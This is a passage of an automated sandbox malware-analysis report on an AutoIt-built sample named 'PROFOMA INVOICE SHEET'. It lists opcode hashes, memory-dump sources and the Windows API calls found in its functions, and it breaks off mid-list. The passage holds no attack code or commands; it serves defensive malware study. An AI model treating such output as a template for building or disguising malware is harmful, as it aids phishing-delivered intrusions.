                                    • Opcode Fuzzy Hash: 0a32faf88c5a7f614e15729b43561e79eb913dadd86ad899b1491f090668f39e
                                    • Instruction Fuzzy Hash: 1D22C070E04609DFDF16CFA4D891AAEB7F5FF48300F144629E812AB292EB35AD55CB50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e156f25ab105d497d338c40867b6c24880bad88b1b478c5359f17b9b6b08fa45
                                    • Instruction ID: 41566a60ea4c59a57e518e05e928cb28025be163aa1ae3b68bafd62c2e2bafe4
                                    • Opcode Fuzzy Hash: e156f25ab105d497d338c40867b6c24880bad88b1b478c5359f17b9b6b08fa45
                                    • Instruction Fuzzy Hash: 300293B1E00209EFDB06DF54D891AAEB7F5FF44300F118569E8169F291EB31AE64CB91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                    • Instruction ID: d2d895a4fb6b4dc88b63e5c1d7e9173a9354e397f34598df62b1fde0f7d04f5b
                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                    • Instruction Fuzzy Hash: 7C9197726080B34ADB2B463EA63403EFFE15AA23A131B079DD4F2CB1C5FE24D954D660
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                    • Instruction ID: cdfffd0d16e4104e92ad83c26e6ed58af375ca6bb8e94ff2e9b1150423d81676
                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                    • Instruction Fuzzy Hash: B59152722090F34ADB2F467AA67403EFFF55AA23A131B07AED4F2CA5C1FE14C5549660
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1101109a7aca6c9240b86a5b81b5346692892cd0f00aa9bf77a7222c6507b4f3
                                    • Instruction ID: 683b7e5de93f255f7601935125c21fb50d8e2f32e7e969293fcbb933843222c4
                                    • Opcode Fuzzy Hash: 1101109a7aca6c9240b86a5b81b5346692892cd0f00aa9bf77a7222c6507b4f3
                                    • Instruction Fuzzy Hash: 6F61687120C77996DF3B9A28BC96BBE2398FF41710F11091AE843DF781DA119E42C355
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ae775686523cefaf716bc709e2bb84fe581747dc68f5c49cb4b06459e5ea2702
                                    • Instruction ID: d9661aac4ecbb6ee0410f47976dc7c6aa92af88d001bdb6b3853dce5ca5d80a6
                                    • Opcode Fuzzy Hash: ae775686523cefaf716bc709e2bb84fe581747dc68f5c49cb4b06459e5ea2702
                                    • Instruction Fuzzy Hash: 6C61AD3520873957DF3B5A287852BBF2388FF42740F120959E943DF681DA12ED428365
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                    • Instruction ID: 6d0693dcb4783f3cd85170f81342071bac836eb06b52e045c50b9b4fa5a7a3e2
                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                    • Instruction Fuzzy Hash: 938185726080B309DB6F423EA67403EFFE15AA23A131B079DD4F2CB5C5EE24C554E660
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d8a53085bc295b849a9050b6e65794725728741d28835c6b98db788da6aee984
                                    • Instruction ID: 0ac7302879e4afacf8134b458c833bc9db2ba702d8ffc65adcc78167a7564daf
                                    • Opcode Fuzzy Hash: d8a53085bc295b849a9050b6e65794725728741d28835c6b98db788da6aee984
                                    • Instruction Fuzzy Hash: 266134B69193C09FC727CF2494A4512BFF1EF12355B1A48EFC8869B992D330E94ACB01
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 99dcb2b027e5e403e2e1ff1428987586896595542bd92bb0d1330d272dd58002
                                    • Instruction ID: 53741db1206e38c65ea082beb1c2ba17cc6884064e02db2bf03592865480a10b
                                    • Opcode Fuzzy Hash: 99dcb2b027e5e403e2e1ff1428987586896595542bd92bb0d1330d272dd58002
                                    • Instruction Fuzzy Hash: 1B41B6E29AEBD24FC31397786C791417F70AE2714934E4AEFC081A74D7E694410ACB8B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                    • Instruction ID: de9bf21100126a1a1e50c2fe06beccc3fe52637d8f6182efb6b2a7d4d8564944
                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                    • Instruction Fuzzy Hash: D741A271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                    • Instruction ID: 254f4d523222baaa3c24bf75d1666598403ee6e8cef472cf0734ae96e7fd6982
                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                    • Instruction Fuzzy Hash: E601A479A10209EFCB48DF98C5909AEF7F9FF48310F208599D90AA7301D730AE41DB90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                    • Instruction ID: d1dfa8f133f18bc033496ea8d0ecad097732ac5258fe420c6e2cc05a1cf3012c
                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                    • Instruction Fuzzy Hash: 3C019279A10209EFCB48DF98C5909AEF7B9FF48710F208599D81AA7341D730AE41DB94
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 00382B30
                                    • DeleteObject.GDI32(00000000), ref: 00382B43
                                    • DestroyWindow.USER32 ref: 00382B52
                                    • GetDesktopWindow.USER32 ref: 00382B6D
                                    • GetWindowRect.USER32(00000000), ref: 00382B74
                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00382CA3
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00382CB1
                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382CF8
                                    • GetClientRect.USER32(00000000,?), ref: 00382D04
                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00382D40
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382D62
                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382D75
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382D80
                                    • GlobalLock.KERNEL32(00000000), ref: 00382D89
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382D98
                                    • GlobalUnlock.KERNEL32(00000000), ref: 00382DA1
                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382DA8
                                    • GlobalFree.KERNEL32(00000000), ref: 00382DB3
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382DC5
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0039FC38,00000000), ref: 00382DDB
                                    • GlobalFree.KERNEL32(00000000), ref: 00382DEB
                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00382E11
                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00382E30
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00382E52
                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0038303F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                    • String ID: $AutoIt v3$DISPLAY$static
                                    • API String ID: 2211948467-2373415609
                                    • Opcode ID: 3c16c57cea9fcc2a3d9aeb2f9d981a021ca6733894dcbd023b7a140ae52f073b
                                    • Instruction ID: 1317ba23ecc63c8eaf068c5d1384e418954e36dfbe63b820c1ea9d3d621f405f
                                    • Opcode Fuzzy Hash: 3c16c57cea9fcc2a3d9aeb2f9d981a021ca6733894dcbd023b7a140ae52f073b
                                    • Instruction Fuzzy Hash: E1028B75A10204AFDB16DFA4CC89EAE7BB9FF49710F048159F915AB2A1CB71ED01CB60
                                    APIs
                                    • SetTextColor.GDI32(?,00000000), ref: 0039712F
                                    • GetSysColorBrush.USER32(0000000F), ref: 00397160
                                    • GetSysColor.USER32(0000000F), ref: 0039716C
                                    • SetBkColor.GDI32(?,000000FF), ref: 00397186
                                    • SelectObject.GDI32(?,?), ref: 00397195
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 003971C0
                                    • GetSysColor.USER32(00000010), ref: 003971C8
                                    • CreateSolidBrush.GDI32(00000000), ref: 003971CF
                                    • FrameRect.USER32(?,?,00000000), ref: 003971DE
                                    • DeleteObject.GDI32(00000000), ref: 003971E5
                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00397230
                                    • FillRect.USER32(?,?,?), ref: 00397262
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00397284
                                      • Part of subcall function 003973E8: GetSysColor.USER32(00000012), ref: 00397421
                                      • Part of subcall function 003973E8: SetTextColor.GDI32(?,?), ref: 00397425
                                      • Part of subcall function 003973E8: GetSysColorBrush.USER32(0000000F), ref: 0039743B
                                      • Part of subcall function 003973E8: GetSysColor.USER32(0000000F), ref: 00397446
                                      • Part of subcall function 003973E8: GetSysColor.USER32(00000011), ref: 00397463
                                      • Part of subcall function 003973E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00397471
                                      • Part of subcall function 003973E8: SelectObject.GDI32(?,00000000), ref: 00397482
                                      • Part of subcall function 003973E8: SetBkColor.GDI32(?,00000000), ref: 0039748B
                                      • Part of subcall function 003973E8: SelectObject.GDI32(?,?), ref: 00397498
                                      • Part of subcall function 003973E8: InflateRect.USER32(?,000000FF,000000FF), ref: 003974B7
                                      • Part of subcall function 003973E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003974CE
                                      • Part of subcall function 003973E8: GetWindowLongW.USER32(00000000,000000F0), ref: 003974DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                    • String ID:
                                    • API String ID: 4124339563-0
                                    • Opcode ID: 81721acfbd1d1041df3fa8d1effb956a8b62c69d07d897adb70a5ca465e5921c
                                    • Instruction ID: 1c62082b13ddf26852c8a43cb601d8538634ee0f5071222c5c5a2ddbe494e299
                                    • Opcode Fuzzy Hash: 81721acfbd1d1041df3fa8d1effb956a8b62c69d07d897adb70a5ca465e5921c
                                    • Instruction Fuzzy Hash: E5A19372028301BFDB129F64DC48E5B7BADFF49320F101A1AF9A2961E1D772E944CB51
                                    APIs
                                    • DestroyWindow.USER32(?,?), ref: 00318E14
                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00356AC5
                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00356AFE
                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00356F43
                                      • Part of subcall function 00318F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00318BE8,?,00000000,?,?,?,?,00318BBA,00000000,?), ref: 00318FC5
                                    • SendMessageW.USER32(?,00001053), ref: 00356F7F
                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00356F96
                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00356FAC
                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00356FB7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                    • String ID: 0
                                    • API String ID: 2760611726-4108050209
                                    • Opcode ID: cb1cf62e9118162c32d58f5386677b9213a77ba2abd09a73eb09d7c782df3ef9
                                    • Instruction ID: 4b3fd9c7d949dae6cd7a61b23a062b06553c6d8f720bde7fc963ce9472f04dd4
                                    • Opcode Fuzzy Hash: cb1cf62e9118162c32d58f5386677b9213a77ba2abd09a73eb09d7c782df3ef9
                                    • Instruction Fuzzy Hash: 0412CE30601201EFCB27CF14D956FA5B7F9FB49302F95446AE8858B662CB32EC95CB91
                                    APIs
                                    • DestroyWindow.USER32(00000000), ref: 0038273E
                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0038286A
                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 003828A9
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 003828B9
                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00382900
                                    • GetClientRect.USER32(00000000,?), ref: 0038290C
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00382955
                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00382964
                                    • GetStockObject.GDI32(00000011), ref: 00382974
                                    • SelectObject.GDI32(00000000,00000000), ref: 00382978
                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00382988
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00382991
                                    • DeleteDC.GDI32(00000000), ref: 0038299A
                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003829C6
                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 003829DD
                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00382A1D
                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00382A31
                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00382A42
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00382A77
                                    • GetStockObject.GDI32(00000011), ref: 00382A82
                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00382A8D
                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00382A97
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                    • API String ID: 2910397461-517079104
                                    • Opcode ID: acd4ccc1842a2d9105120b2b728c3fd8a5adc55cfcfa3a0f7d8cdb42e59f9564
                                    • Instruction ID: c24537cb1ee7f16c2bf02b98bd74897833e2201c3bbd16e48c67198fcafd9860
                                    • Opcode Fuzzy Hash: acd4ccc1842a2d9105120b2b728c3fd8a5adc55cfcfa3a0f7d8cdb42e59f9564
                                    • Instruction Fuzzy Hash: 45B16A75A10205AFEB15DFA8DC4AFAFBBA9EB08710F008155F914EB2D0D770AD40CBA0
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 00374AED
                                    • GetDriveTypeW.KERNEL32(?,0039CB68,?,\\.\,0039CC08), ref: 00374BCA
                                    • SetErrorMode.KERNEL32(00000000,0039CB68,?,\\.\,0039CC08), ref: 00374D36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DriveType
                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                    • API String ID: 2907320926-4222207086
                                    • Opcode ID: 3e8d38fe0e412d8612b7be8d75b02a1068d4e5625905c0c6bed805a64a61efb0
                                    • Instruction ID: 9203acbb8367966be748e4288a09e1c515648a188b12cc2660a5c92d8a86a153
                                    • Opcode Fuzzy Hash: 3e8d38fe0e412d8612b7be8d75b02a1068d4e5625905c0c6bed805a64a61efb0
                                    • Instruction Fuzzy Hash: 6961C431705206EBCB27DF18C996EA977A4AF44300B25C419F80BEB696DB39FD41DB41
                                    APIs
                                    • GetSysColor.USER32(00000012), ref: 00397421
